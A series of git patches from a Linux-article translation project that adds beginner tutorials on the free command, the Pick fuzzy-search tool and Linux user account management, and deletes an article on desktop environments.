create mode 100644 sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
diff --git a/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
new file mode 100644
index 0000000000..9cdd4c4b1c
--- /dev/null
+++ b/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
@@ -0,0 +1,120 @@
+Linux Free Command Explained for Beginners (6 Examples)
+======
+
+Sometimes, while working on the command line in Linux, you might want to quickly take a look at the total available as well as used memory in the system. If you're a Linux newbie, you'll be glad to know there exists a built-in command - dubbed **free** \- that displays this kind of information.
+
+In this tutorial, we will discuss the basics of the free command as well as some of the important features it provides. But before we do that, it's worth sharing that all commands/instructions mentioned here have been tested on Ubuntu 16.04 LTS.
+
+### Linux free command
+
+Here's the syntax of the free command:
+
+free [options]
+
+And following is how the tool's man page describes it:
+```
+free displays the total amount of free and used physical and swap memory in the system, as well as
+the buffers and caches used by the kernel. The information is gathered by parsing
+/proc/meminfo.
+```
+
+Following are some Q&A-styled examples that should give you a good idea about how the free command works.
+
+### Q1. How to view used and available memory using free command?
+
+This is very easy. All you have to do is to run the free command without any options.
+
+free
+
+Here's the output the free command produced on my system:
+
+[![view used and available memory using free command][1]][2]
+
+And here's what these columns mean:
+
+[![Free command columns][3]][4]
+
+### Q2. How to change the display metric?
+
+If you want, you can change the display metric of memory figures that the free command produces in output. For example, if you want to display memory in megabytes, you can use the **-m** command line option.
+
+free -m
+
+[![free command display metrics change][5]][6]
+
+Similarly, you can use **-b** for bytes, **-k** for kilobytes, **-m** for megabytes, **-g** for gigabytes, **\--tera** for terabytes.
+
+### Q3. How to display memory figures in human readable form?
+
+The free command also offers an option **-h** through which you can ask the tool to display memory figures in human-readable form.
+
+free -h
+
+With this option turned on, the command decides for itself which display metric to use for individual memory figures. For example, here's how the -h option worked in our case:
+
+[![display data from free command in human readable form][7]][8]
+
+### Q4. How to make free display results continuously with time gap?
+
+If you want, you can also have the free command executed in a way that it continuously displays output after a set time gap. For this, use the **-s** command line option. This option requires the user to pass a numeric value that will be treated as the number of seconds after which output will be displayed.
+
+For example, to keep a gap of 3 seconds, run the command in the following way:
+
+free -s 3
+
+In this setup, if you want free to run only a set number of times, you can use the **-c** command option, which requires a count value to be passed to it. For example:
+
+free -s 3 -c 5
+
+The aforementioned command will make sure the tool runs 5 times, with a 3-second time gap between each of the tries.
+
+**Note** : This functionality is currently [buggy][9], so we couldn't test it at our end.
+
+### Q5. How to make free use power of 1000 (not 1024) while displaying memory figures?
+
+If you change the display metric to, say, megabytes (using the -m option), but want the figures to be calculated based on powers of 1000 (not 1024), then this can be done using the **\--si** option. For example, the following screenshot shows the difference in output with and without this option:
+
+[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
+
+### Q6. How to make free display total of columns?
+
+If you want free to display a total of all memory figures in each column, then you can use the **-t** command line option.
+
+free -t
+
+The following screenshot shows this command line option in action:
+
+[![How to make free display total of columns][12]][13]
+
+Note the new 'Total' row that's displayed in this case.
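+
+These options can be combined as well. For example, to get a human-readable listing that also includes the 'Total' row, you could run the following (a combination not shown in the screenshots above, but supported by free):
+
+free -h -t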
+
+### Conclusion
+
+The free command can prove to be an extremely useful tool if you're into system administration. It's easy to understand and use, with many options to customize output. We've covered many useful options in this tutorial. After you're done practicing these, head to the command's [man page][14] for more.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-free-command/
+
+作者:[Himanshu Arora][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/linux_free_command/free-command-output.png
+[2]:https://www.howtoforge.com/images/linux_free_command/big/free-command-output.png
+[3]:https://www.howtoforge.com/images/linux_free_command/free-output-columns.png
+[4]:https://www.howtoforge.com/images/linux_free_command/big/free-output-columns.png
+[5]:https://www.howtoforge.com/images/linux_free_command/free-m-option.png
+[6]:https://www.howtoforge.com/images/linux_free_command/big/free-m-option.png
+[7]:https://www.howtoforge.com/images/linux_free_command/free-h.png
+[8]:https://www.howtoforge.com/images/linux_free_command/big/free-h.png
+[9]:https://bugs.launchpad.net/ubuntu/+source/procps/+bug/1551731
+[10]:https://www.howtoforge.com/images/linux_free_command/free-si-option.png
+[11]:https://www.howtoforge.com/images/linux_free_command/big/free-si-option.png
+[12]:https://www.howtoforge.com/images/linux_free_command/free-t-option.png
+[13]:https://www.howtoforge.com/images/linux_free_command/big/free-t-option.png
+[14]:https://linux.die.net/man/1/free
From 6a4d9c2e07ea067e9540158983cf20d44561a2bd Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:12:45 +0800
Subject: [PATCH 057/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20A=20Commandline?=
=?UTF-8?q?=20Fuzzy=20Search=20Tool=20For=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Commandline Fuzzy Search Tool For Linux.md | 138 ++++++++++++++++++
1 file changed, 138 insertions(+)
create mode 100644 sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
diff --git a/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md b/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
new file mode 100644
index 0000000000..ae599ad22b
--- /dev/null
+++ b/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
@@ -0,0 +1,138 @@
+translating by lujun9972
+A Commandline Fuzzy Search Tool For Linux
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/search-720x340.jpg)
+Today, we will be discussing an interesting command-line utility called **"Pick"**. It allows users to select from a set of choices using an ncurses(3X) interface with fuzzy search functionality. The Pick utility can be helpful in situations where you want to search for a folder or file that contains non-English characters in its name. You don't have to learn how to type the non-English characters. Using Pick, you can easily search for them, select them, and view them or cd into them. You don't even have to type any characters to search for a file or folder. It's good for those working with a large pile of directories and files.
+
+### Pick - A Commandline Fuzzy Search Tool For Linux
+
+#### Installing Pick
+
+For **Arch Linux** and its derivatives, Pick is available in the [**AUR**][1], so Arch users can install it using AUR helper tools such as [**Pacaur**][2], [**Packer**][3], or [**Yaourt**][4].
+```
+pacaur -S pick
+```
+
+Or,
+```
+packer -S pick
+```
+
+Or,
+```
+yaourt -S pick
+```
+
+**Debian**, **Ubuntu**, and **Linux Mint** users can run the following command to install Pick.
+```
+sudo apt-get install pick
+```
+
+For other distributions, download the latest release from [**here**][5] and follow the instructions below to install Pick. At the time of writing this guide, the latest version was 1.9.0.
+```
+wget https://github.com/calleerlandsson/pick/releases/download/v1.9.0/pick-1.9.0.tar.gz
+tar -zxvf pick-1.9.0.tar.gz
+cd pick-1.9.0/
+```
+
+Configure it using the following command:
+```
+./configure
+```
+
+Finally, build and install pick:
+```
+make
+sudo make install
+```
+
+#### Usage
+
+Combining it with other commands will make your command-line life much easier. I will show some examples so you can understand how it works.
+
+Let me create a stack of directories.
+```
+mkdir -p abcd/efgh/ijkl/mnop/qrst/uvwx/yz/
+```
+
+Now, say you want to go to the ijkl/ directory. You have two choices. You can either use the **cd** command like below:
+```
+cd abcd/efgh/ijkl/
+```
+
+Or, create a [**shortcut**][6] or an alias to that directory, so you can switch to the directory in no time.
+
+Alternatively, just use the "pick" command to switch to a particular directory more easily. Have a look at the example below.
+```
+cd $(find . -type d | pick)
+```
+
+This command will list all directories and their sub-directories under the current working directory, so you can just select any directory you'd like to cd into using the Up/Down arrows and hit the ENTER key.
+
+**Sample output:**
+
+[![][7]][8]
+
+Also, it will suggest the directories or files that contain specific letters as you type them. For example, the following output shows the list of suggestions when I type "or".
+
+[![][7]][9]
+
+That's just one example. You can use the "pick" command along with other commands as well.
+
+Here is another example.
+```
+find -type f | pick | xargs less
+```
+
+This command will allow you to select any file in the current directory and view it in **less**.
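+
+In the same spirit, you could open the selected file directly in an editor instead of viewing it in less (a small variation on the command above; substitute vim with your preferred editor):
+```
+vim "$(find . -type f | pick)"
+```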
+
+[![][7]][10]
+
+Care to learn another example? Here you go. The following command will let you select individual files or folders in the current directory and move them to any destination of your choice, for example **/home/sk/ostechnix**.
+```
+mv "$(find . -maxdepth 1 |pick)" /home/sk/ostechnix/
+```
+
+[![][7]][11]
+
+Choose the file(s) by using the Up/Down arrows and hit ENTER to move them to the /home/sk/ostechnix/ directory.
+
+[![][7]][12]
+
+As you can see in the above output, I have moved the folder called "abcd" to the "ostechnix" directory.
+
+The use cases are unlimited. There is also a plugin called [**pick.vim**][13] that makes your searches much easier inside the Vim editor.
+
+For more details, refer to the man page:
+```
+man pick
+```
+
+That's all for now, folks. Hope this utility helps. If you find our guides useful, please share them on your social and professional networks and recommend the OSTechNix blog to all your contacts.
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/pick-commandline-fuzzy-search-tool-linux/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://aur.archlinux.org/packages/pick/
+[2]:https://www.ostechnix.com/install-pacaur-arch-linux/
+[3]:https://www.ostechnix.com/install-packer-arch-linux-2/
+[4]:https://www.ostechnix.com/install-yaourt-arch-linux/
+[5]:https://github.com/calleerlandsson/pick/releases/
+[6]:https://www.ostechnix.com/create-shortcuts-frequently-used-directories-shell/
+[7]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_001-3.png ()
+[9]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_002-1.png ()
+[10]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_004-1.png ()
+[11]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_005.png ()
+[12]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_006-1.png ()
+[13]:https://github.com/calleerlandsson/pick.vim/
From dfbadcaaa556aa8fdf09e6c38019d14f45e78b59 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:14:45 +0800
Subject: [PATCH 058/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Managing=20users?=
=?UTF-8?q?=20on=20Linux=20systems?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...0170926 Managing users on Linux systems.md | 223 ++++++++++++++++++
1 file changed, 223 insertions(+)
create mode 100644 sources/tech/20170926 Managing users on Linux systems.md
diff --git a/sources/tech/20170926 Managing users on Linux systems.md b/sources/tech/20170926 Managing users on Linux systems.md
new file mode 100644
index 0000000000..9842eab1d5
--- /dev/null
+++ b/sources/tech/20170926 Managing users on Linux systems.md
@@ -0,0 +1,223 @@
+Managing users on Linux systems
+======
+Your Linux users may not be raging bulls, but keeping them happy is always a challenge as it involves managing their accounts, monitoring their access rights, tracking down the solutions to problems they run into, and keeping them informed about important changes on the systems they use. Here are some of the tasks and tools that make the job a little easier.
+
+### Configuring accounts
+
+Adding and removing accounts is the easier part of managing users, but there are still a lot of options to consider. Whether you use a desktop tool or go with command line options, the process is largely automated. You can set up a new user with a command as simple as **adduser jdoe** and a number of things will happen. John's account will be created using the next available UID and likely populated with a number of files that help to configure his account. When you run the adduser command with a single argument (the new username), it will prompt for some additional information and explain what it is doing.
+```
+$ sudo adduser jdoe
+Adding user `jdoe' ...
+Adding new group `jdoe' (1001) ...
+Adding new user `jdoe' (1001) with group `jdoe' ...
+Creating home directory `/home/jdoe' ...
+Copying files from `/etc/skel' …
+Enter new UNIX password:
+Retype new UNIX password:
+passwd: password updated successfully
+Changing the user information for jdoe
+Enter the new value, or press ENTER for the default
+ Full Name []: John Doe
+ Room Number []:
+ Work Phone []:
+ Home Phone []:
+ Other []:
+Is the information correct? [Y/n] Y
+
+```
+
+As you can see, adduser adds the user's information (to the /etc/passwd and /etc/shadow files), creates the new home directory and populates it with some files from /etc/skel, prompts for you to assign the initial password and identifying information, and then verifies that it's got everything right. If you answer "n" for no at the final "Is the information correct?" prompt, it will run back through all of your previous answers, allowing you to change any that you might want to change.
+
+Once an account is set up, you might want to verify that it looks as you'd expect. However, a better strategy is to ensure that the choices being made "automagically" match what you want to see _before_ you add your first account. The defaults are defaults for good reason, but it's useful to know where they're defined in case you want some to be different - for example, if you don't want home directories in /home, you don't want user UIDs to start with 1000, or you don't want the files in home directories to be readable by _everyone_ on the system.
+
+Some of the details of how the adduser command works are configured in the /etc/adduser.conf file. This file contains a lot of settings that determine how new accounts are configured and will look something like this. Note that the comments and blank lines are omitted in the output below so that we can focus more easily on just the settings.
+```
+$ cat /etc/adduser.conf | grep -v "^#" | grep -v "^$"
+DSHELL=/bin/bash
+DHOME=/home
+GROUPHOMES=no
+LETTERHOMES=no
+SKEL=/etc/skel
+FIRST_SYSTEM_UID=100
+LAST_SYSTEM_UID=999
+FIRST_SYSTEM_GID=100
+LAST_SYSTEM_GID=999
+FIRST_UID=1000
+LAST_UID=29999
+FIRST_GID=1000
+LAST_GID=29999
+USERGROUPS=yes
+USERS_GID=100
+DIR_MODE=0755
+SETGID_HOME=no
+QUOTAUSER=""
+SKEL_IGNORE_REGEX="dpkg-(old|new|dist|save)"
+
+```
+
+As you can see, we've got a default shell (DSHELL), the starting value for UIDs (FIRST_UID), the location for home directories (DHOME) and the source location for startup files (SKEL) that will be added to each account as it is set up - along with a number of additional settings. This file also specifies the permissions to be assigned to home directories (DIR_MODE).
+
+One of the more important settings is DIR_MODE, which determines the permissions that are used for each user's home directory. With the 0755 setting shown above, home directories will be set up with rwxr-xr-x permissions. Users will be able to read other users' files, but not modify or remove them. If you want to be more restrictive, you can change this setting to 750 (no access by anyone outside the user's group) or even 700 (no access but the user himself).
+
+Any user account settings can be manually changed after the accounts are set up. For example, you can edit the /etc/passwd file or chmod a home directory, but configuring the /etc/adduser.conf file _before_ you start adding accounts on a new server will ensure some consistency and save you some time and trouble over the long run.
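+
+As a minimal sketch on a Debian-style system, tightening the default for future accounts and fixing up one existing home directory might look like this (adjust the username and mode to suit your site):
+```
+$ sudo sed -i 's/^DIR_MODE=.*/DIR_MODE=0750/' /etc/adduser.conf
+$ sudo chmod 750 /home/jdoe
+
+```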
+
+Changes to the /etc/adduser.conf file will affect all accounts that are set up subsequent to those changes. If you want to set up some specific account differently, you've also got the option of providing account configuration options as arguments with the adduser command in addition to the username. Maybe you want to assign a different shell for some user, request a specific UID, or disable logins altogether. The man page for the adduser command will display some of your choices for configuring an individual account.
+```
+adduser [options] [--home DIR] [--shell SHELL] [--no-create-home]
+[--uid ID] [--firstuid ID] [--lastuid ID] [--ingroup GROUP | --gid ID]
+[--disabled-password] [--disabled-login] [--gecos GECOS]
+[--add_extra_groups] [--encrypt-home] user
+
+```
+
+These days probably every Linux system is, by default, going to put each user into his or her own group. As an admin, you might elect to do things differently. You might find that putting users in shared groups works better for your site, electing to use adduser's --gid option to select a specific group. Users can, of course, always be members of multiple groups, so you have some options on how to manage groups -- both primary and secondary.
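+
+As a sketch, creating an account whose primary group is the existing shared "users" group (GID 100, matching the USERS_GID setting shown earlier) rather than a brand new per-user group might look like this:
+```
+$ sudo adduser --gid 100 jdoe2
+
+```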
+
+### Dealing with user passwords
+
+Since it's always a bad idea to know someone else's password, admins will generally use a temporary password when they set up an account and then run a command that will force the user to change his password on his first login. Here's an example:
+```
+$ sudo chage -d 0 jdoe
+
+```
+
+When the user logs in, he will see something like this:
+```
+WARNING: Your password has expired.
+You must change your password now and login again!
+Changing password for jdoe.
+(current) UNIX password:
+
+```
+
+### Adding users to secondary groups
+
+To add a user to a secondary group, you might use the usermod command as shown below -- to add the user to the group and then verify that the change was made.
+```
+$ sudo usermod -a -G sudo jdoe
+$ sudo grep sudo /etc/group
+sudo:x:27:shs,jdoe
+
+```
+
+Keep in mind that some groups -- like the sudo or wheel group -- imply certain privileges. More on this in a moment.
+
+### Removing accounts, adding groups, etc.
+
+Linux systems also provide commands to remove accounts, add new groups, remove groups, etc. The **deluser** command, for example, will remove the user login entries from the /etc/passwd and /etc/shadow files but leave her home directory intact unless you add the --remove-home or --remove-all-files option. The **addgroup** command adds a group, but will give it the next group id in the sequence (i.e., likely in the user group range) unless you use the --gid option.
+```
+$ sudo addgroup testgroup --gid=131
+Adding group `testgroup' (GID 131) ...
+Done.
+
+```
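+
+Going the other direction, removing an account along with its home directory (rather than leaving the files behind) is just a matter of adding the option mentioned above, for example:
+```
+$ sudo deluser --remove-home jdoe
+
+```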
+
+### Managing privileged accounts
+
+Some Linux systems have a wheel group that gives members the ability to run commands as root. In this case, the /etc/sudoers file references this group. On Debian systems, this group is called sudo, but it works the same way and you'll see a reference like this in the /etc/sudoers file:
+```
+%sudo ALL=(ALL:ALL) ALL
+
+```
+
+This setting basically means that anyone in the wheel or sudo group can run all commands with the power of root once they preface them with the sudo command.
+
+You can also add more limited privileges to the sudoers file -- maybe to give particular users the ability to run one or two commands as root. If you do, you should also periodically review the /etc/sudoers file to gauge how much privilege users have and verify that the privileges provided are still required.
+
+In the command shown below, we're looking at the active lines in the /etc/sudoers file. The most interesting lines in this file include the path set for commands that can be run using the sudo command and the two groups that are allowed to run commands via sudo. As was just mentioned, individuals can be given permissions by being directly included in the sudoers file, but it is generally better practice to define privileges through group memberships.
+```
+# cat /etc/sudoers | grep -v "^#" | grep -v "^$"
+Defaults env_reset
+Defaults mail_badpass
+Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
+root ALL=(ALL:ALL) ALL
+%admin ALL=(ALL) ALL <== admin group
+%sudo ALL=(ALL:ALL) ALL <== sudo group
+
+```
+
+### Checking on logins
+
+To see when a user last logged in, you can use a command like this one:
+```
+# last jdoe
+jdoe pts/18 192.168.0.11 Thu Sep 14 08:44 - 11:48 (00:04)
+jdoe pts/18 192.168.0.11 Thu Sep 14 13:43 - 18:44 (00:00)
+jdoe pts/18 192.168.0.11 Thu Sep 14 19:42 - 19:43 (00:00)
+
+```
+
+If you want to see when each of your users last logged in, you can run the last command through a loop like this one:
+```
+$ for user in `ls /home`; do last $user | head -1; done
+
+jdoe pts/18 192.168.0.11 Thu Sep 14 19:42 - 19:43 (00:03)
+
+rocket pts/18 192.168.0.11 Thu Sep 14 13:02 - 13:02 (00:00)
+shs pts/17 192.168.0.11 Thu Sep 14 12:45 still logged in
+
+
+```
+
+This command will only show you users who have logged on since the current wtmp file became active. The blank lines indicate that some users have never logged in since that time, but it doesn't call them out. A better command is this one, which clearly displays the users who have not logged in at all in this time period:
+```
+$ for user in `ls /home`; do echo -n "$user ";last $user | head -1 | awk '{print substr($0,40)}'; done
+dhayes
+jdoe pts/18 192.168.0.11 Thu Sep 14 19:42 - 19:43
+peanut pts/19 192.168.0.29 Mon Sep 11 09:15 - 17:11
+rocket pts/18 192.168.0.11 Thu Sep 14 13:02 - 13:02
+shs pts/17 192.168.0.11 Thu Sep 14 12:45 still logged
+tsmith
+
+```
+
+That command is a lot to type, but could be turned into a script to make it a lot easier to use.
+```
+#!/bin/bash
+
+for user in `ls /home`
+do
+ echo -n "$user ";last $user | head -1 | awk '{print substr($0,40)}'
+done
+
+```
+
+Sometimes this kind of information can alert you to changes in users' roles that suggest they may no longer need the accounts in question.
+
+### Communicating with users
+
+Linux systems provide a number of ways to communicate with your users. You can add messages to the /etc/motd file that will be displayed when a user logs into a server using a terminal connection. You can also message users with commands such as write (message a single user) or wall (write to all logged-in users).
+```
+$ wall System will go down in one hour
+
+Broadcast message from shs@stinkbug (pts/17) (Thu Sep 14 14:04:16 2017):
+
+System will go down in one hour
+
+```
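+
+The write command works similarly for a single user: name the user (and, optionally, the terminal reported by the who command), type your message, and finish with Ctrl-D. A quick sketch:
+```
+$ write jdoe pts/18
+The system will go down in one hour -- please save your work.
+
+```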
+
+Important messages should probably be delivered through multiple channels as it's difficult to predict what users will actually notice. Together, message-of-the-day (motd), wall, and email notifications might stand a chance of getting most of your users' attention.
+
+### Paying attention to log files
+
+Paying attention to log files can also help you understand user activity. In particular, the /var/log/auth.log file will show you user login and logout activity, creation of new groups, etc. The /var/log/messages or /var/log/syslog files will tell you more about system activity.
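+
+For a quick look at recent login and logout activity without paging through the whole file, something like this works on Debian/Ubuntu-style systems (the log path differs on some distributions):
+```
+$ sudo grep "session opened" /var/log/auth.log | tail -5
+
+```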
+
+### Tracking problems and requests
+
+Whether or not you install a ticketing application on your Linux system, it's important to track the problems that your users run into and the requests that they make. Your users won't be happy if some portion of their requests fall through the proverbial cracks. Even a paper log could be helpful or, better yet, a spreadsheet that allows you to notice what issues are still outstanding and what the root cause of the problems turned out to be. Ensuring that problems and requests are addressed is important and logs can also help you remember what you had to do to address a problem that re-emerges many months or even years later.
+
+### Wrap-up
+
+Managing user accounts on a busy server depends in part on starting out with well configured defaults and in part on monitoring user activities and problems encountered. Users are likely to be happy if they feel you are responsive to their concerns and know what to expect when system upgrades are needed.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.networkworld.com/article/3225109/linux/managing-users-on-linux-systems.html
+
+作者:[Sandra Henry-Stocker][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/
From 1e59051b0c78e9bcadf802474ef73229bd7d6fe2 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 6 Jan 2018 12:17:41 +0800
Subject: [PATCH 059/371] Delete 20171219 Migrating to Linux- Graphical
Environments.md
---
...rating to Linux- Graphical Environments.md | 110 ------------------
1 file changed, 110 deletions(-)
delete mode 100644 sources/tech/20171219 Migrating to Linux- Graphical Environments.md
diff --git a/sources/tech/20171219 Migrating to Linux- Graphical Environments.md b/sources/tech/20171219 Migrating to Linux- Graphical Environments.md
deleted file mode 100644
index 907d334533..0000000000
--- a/sources/tech/20171219 Migrating to Linux- Graphical Environments.md
+++ /dev/null
@@ -1,110 +0,0 @@
-translating by CYLeft
-
-Migrating to Linux: Graphical Environments
-======
-This is the third article in our series on migrating to Linux. If you missed earlier articles, they provided an [introduction to Linux for new users][1] and an [overview of Linux files and filesystems][2]. In this article, we'll discuss graphical environments. One of the advantages of Linux is that you have lots of choices, and you can select a graphical interface and customize it to work just the way you like it.
-
-Some of the popular graphical environments in Linux include: Cinnamon, Gnome, KDE Plasma, Xfce, and MATE, but there are many options.
-
-One thing that is often confusing to new Linux users is that, although specific Linux distributions have a default graphical environment, usually you can change the graphical interface at any time. This is different from what people are used to with Windows and Mac OS. The distribution and the graphical environment are separate things, and in many cases, they aren't tightly coupled together. Additionally, you can run applications built for one graphical environment inside other graphical environments. For example, an application built for the KDE Plasma graphical interface will typically run just fine in the Gnome desktop graphical environment.
-
-Some Linux graphical environments try to mimic Microsoft Windows or Apple's MacOS to a degree because that's what some people are familiar with, but other graphical interfaces are unique.
-
-Below, I'll cover several options showcasing different graphical environments running on different distributions. If you are unsure about which distribution to go with, I recommend starting with [Ubuntu][3]. Get the Long Term Support (LTS) version (which is 16.04.3 at the time of writing). Ubuntu is very stable and easy to use.
-
-### Transitioning from Mac
-
-The Elementary OS distribution provides a very Mac-like interface. It's default graphical environment is called Pantheon, and it makes transitioning from a Mac easy. It has a dock at the bottom of the screen and is designed to be extremely simple to use. In its aim to keep things simple, many of the default apps don't even have menus. Instead, there are buttons and controls on the title bar of the application (Figure 1).
-
-
-![Elementary OS][5]
-
-Figure 1: Elementary OS with Pantheon.
-
-The Ubuntu distribution presents a default graphical interface that is also very Mac like. Ubuntu 17.04 or older uses the graphical environment called Unity, which by default places the dock on the left side of the screen and has a global menu bar area at the top that is shared across all applications. Note that newer versions of Ubuntu are switching to the Gnome environment.
-
-### Transitioning from Windows
-
-ChaletOS models its interface after Windows to help make migrating from Windows easier. ChaletOS used the graphical environment called Xfce (Figure 2). It has a home/start menu in the usual lower left corner of the screen with the search bar. There are desktop icons and notifications in the lower right corner. It looks so much like Windows that, at first glance, people may even assume you are running Windows.
-
-The Zorin OS distribution also tries to mimic Windows. Zorin OS uses the Gnome desktop modified to work like Windows' graphical interface. The start button is at the bottom left with the notification and indicator panel on the lower right. The start button brings up a Windows-like list of applications and a search bar to search.
-
-### Unique Environments
-
-One of the most commonly used graphical environments for Linux is the Gnome desktop (Figure 3). Many distributions use Gnome as the default graphical environment. Gnome by default doesn't try to be like Windows or MacOS but aims for elegance and ease of use in its own way.
-
-The Cinnamon environment was created mostly out of a negative reaction to the Gnome desktop environment when it changed drastically from version 2 to version 3. Although Cinnamon doesn't look like the older Gnome desktop version 2, it attempts to provide a simple interface, which functions somewhat similar to that of Windows XP.
-
-The graphical environment called MATE is modeled directly after Gnome version 2, which has a menu bar at the top of the screen for applications and settings, and it presents a panel at the bottom of the screen for running application tabs and other widgets.
-
-The KDE plasma environment is built around a widget interface where widgets can be installed on the desktop or in a panel (Figure 4).
-
-![KDE Plasma][8]
-
-Figure 4: Kubuntu with KDE Plasma.
-
-[Used with permission][6]
-
-No graphical environment is better than another. They're just different to suit different people's tastes. And again, if the options seem too much, start with [Ubuntu][3].
-
-### Differences and Similarities
-
-Different operating systems do some things differently, which can make the transition challenging. For example, menus may appear in different places and settings may use different paths to access options. Here I list a few things that are similar and different in Linux to help ease the adjustment.
-
-### Mouse
-
-The mouse often works differently in Linux than it does in Windows and MacOS. In Windows and Mac, you double-click on most things to open them up. In Linux, many graphical interfaces are set so that you single-click on an item to open it.
-
-Also in Windows, you usually have to click on a window to make it the focused window. In Linux, many interfaces are set so that the focus window is the one under the mouse, even if it's not on top. The difference can be subtle, and sometimes the behavior is surprising. For example, in Windows if you have a background application (not the top window) and you move the mouse over it, without clicking, and scroll the mouse wheel, the top application window will scroll. In Linux, the background window (the one with the mouse over it) will scroll instead.
-
-### Menus
-
-Application menus are a staple of computer programs and recently there seems to be a movement to move the menus out of the way or to remove them altogether. So when migrating to Linux, you may not find menus where you expect. The application menu might be in a global shared menu bar like on MacOS. The menu might be below a "more options" icon, similar to those in many mobile applications. Or, the menu may be removed altogether in exchange for buttons, as with some of the apps in the Pantheon environment in Elementary OS.
-
-### Workspaces
-
-Many Linux graphical environments present multiple workspaces. A workspace fills your entire screen and contains windows of some running applications. Switching to a different workspace will change which applications are visible. The concept is to group the open applications used for one project together on one workspace and those for another project on a different workspace.
-
-Not everyone needs or even likes workspaces, but I mention these because sometimes, as a newcomer, you might accidentally switch workspaces with a key combination, and go, "Hey! where'd my applications go?" If all you see is the desktop wallpaper image where you expected to see your apps, chances are you've just switched workspaces, and your programs are still running in a workspace that is now not visible. In many Linux environments, you can switch workspaces by pressing Alt-Ctrl and then an arrow (up, down, left, or right). Hopefully, you'll see your programs still there in another workspace.
-
-Of course, if you happen to like workspaces (many people do), then you have found a useful default feature in Linux.
-
-### Settings
-
-Many Linux graphical environments also have some type of settings program or settings panel that let you configure settings on the machine. Note that similarly to Windows and MacOS, things in Linux can be configured in fine detail, and not all of these detailed settings can be found in the settings program. These settings, though, should be enough for most of the things you'll need to set on a typical desktop system, such as selecting the desktop wallpaper, changing how long before the screen goes blank, and connecting to printers, to name a few.
-
-The settings presented in the application will usually not be grouped the same way or named the same way they are on Windows or MacOS. Even different graphical interfaces in Linux can present settings differently, which may take time to adjust to. Online search, of course, is a great place to search for answers on how to configure things in your graphical environment.
-
-### Applications
-
-Finally, applications in Linux might be different. You will likely find some familiar applications but others may be completely new to you. For example, you can find Firefox, Chrome, and Skype on Linux. If you can't find a specific app, there's usually an alternative program you can use. If not, you can run many Windows applications in a compatibility layer called WINE.
-
-On many Linux graphical environments, you can bring up the applications menu by pressing the Windows Logo key on the keyboard. In others, you need to click on a start/home button or click on an applications menu. In many of the graphical environments, you can search for an application by category rather than by its specific name. For example, if you want to use an editor program but you don't know what it's called, you can bring up the application menu and enter "editor" in the search bar, and it will show you one or more applications that are considered editors.
-
-To get you started, here is a short list of a few applications and potential Linux alternatives.
-
-[linux][10]
-
-Note that this list is by no means comprehensive; Linux offers a multitude of options to meet your needs.
-
-Learn more about Linux through the free ["Introduction to Linux" ][9]course from The Linux Foundation and edX.
-
---------------------------------------------------------------------------------
-
-via: https://www.linux.com/blog/learn/2017/12/migrating-linux-graphical-environments
-
-作者:[John Bonesio][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linux.com/users/johnbonesio
-[1]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
-[2]:https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems
-[3]:https://www.evernote.com/OutboundRedirect.action?dest=https%3A%2F%2Fwww.ubuntu.com%2Fdownload%2Fdesktop
-[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elementaryos.png?itok=kJk2-BsL (Elementary OS)
-[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/kubuntu.png?itok=a2E7ttaa (KDE Plasma)
-[9]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
-
